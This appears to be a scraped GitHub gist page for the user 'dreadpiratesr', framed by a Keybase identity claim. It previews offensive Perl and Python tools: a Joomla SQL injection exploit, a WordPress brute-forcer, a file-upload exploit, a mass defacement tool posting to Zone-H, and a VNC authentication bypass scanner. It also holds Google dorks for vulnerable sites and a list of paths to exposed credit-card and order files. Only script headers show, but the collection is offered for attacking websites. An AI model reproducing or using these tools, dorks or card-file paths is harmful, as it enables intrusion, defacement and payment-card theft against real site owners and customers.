I hereby claim:
- I am dreadpiratesr on github.
- I am dreadpiratesr (https://keybase.io/dreadpiratesr) on keybase.
- I have a public key whose fingerprint is 3A74 1C92 2992 DC81 5C77 0E45 5C83 1AF6 AE26 CC2C
To claim this, I am signing this object:
#!/usr/bin/perl | |
#Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
#Google Dork: inurl:index.php?option=com_s5clanroster& | |
#Vendor HomePage: http://www.joomla.org/ | |
system("clear"); | |
system("cls"); | |
print "=========================================================\n"; | |
print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
print "* Coded dreadpiratesr *\n"; | |
print "* *\n"; |
#!/usr/bin/perl | |
# WP-BRUTE BY DPR | |
# dreadpiratesr | |
use LWP::UserAgent; | |
$site = $ARGV[0]; | |
$user = $ARGV[1]; | |
$wordl = $ARGV[2]; |
#!/usr/bin/perl | |
#EXPLOIT: http://www.exploit4arab.net/exploits/1433 | |
use LWP::UserAgent; | |
use strict; | |
use warnings; | |
sub banner { | |
print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n"; | |
print "[!] [ usage ]: perl $0 www.target.gov.crot backdoor.php.gif\n"; | |
print "--------------------------------------------------------------------------------------------------------------------\n"; |
#!/usr/bin/perl | |
# Themes Mass Exploiter Wordpress & Auto Post Zone-h | |
# Upload File and Submit your defacements on Zone-H | |
# TEAM : dreadpiratesr | |
# https://twitter.com/blackmarketi2p | |
# Author : dpr | |
# USAGE => perl bt.pl | |
use HTTP::Request; | |
use LWP::Simple; |
#!/usr/bin/perl | |
use LWP::UserAgent; | |
use LWP::Simple; | |
use strict; | |
use warnings; | |
use threads; | |
use threads::shared; | |
use Config; | |
use HTML::TreeBuilder; |
#!/usr/bin/perl | |
# Scanner VNC - OpenVNC 4.11 authentication bypass By GhOsTrIaX | |
use strict; | |
use warnings; | |
use IO::Socket; | |
use threads; | |
use threads::shared; | |
use Errno qw(EAGAIN); |
Exploit Title: Supercon Direct login to admin panel without entering password | |
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
Product Description | |
——————- | |
Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
We provide world-class technology services by constantly exploring and implementing innovative | |
solutions that drive long-term value to our customers. We have been providing solutions to clients | |
across the globe for more than 5 years and boast of our extensive | |
experience on website designing and development projects. |
/cgi-bin/DCShop/Orders/orders.txt | |
/vpasp/shopdbtest.asp | |
/orders/checks.txt | |
/WebShop/logs | |
/ccbill/secure/ccbill.log /scripts/cart32.exe | |
/cvv2.txt | |
/cart/shopdbtest.asp | |
/cgi-win/cart.pl | |
/shopdbtest.asp | |
/WebShop/logs/cc.txt /cgi-local/cart.pl |
import socket | |
import random | |
import os, sys | |
import threading | |
if sys.platform == 'linux' or sys.platform == 'linux2': | |
clearing = ' clear' | |
else: | |
clearing = 'cls' | |
os.system(clearing) |
I hereby claim:
To claim this, I am signing this object: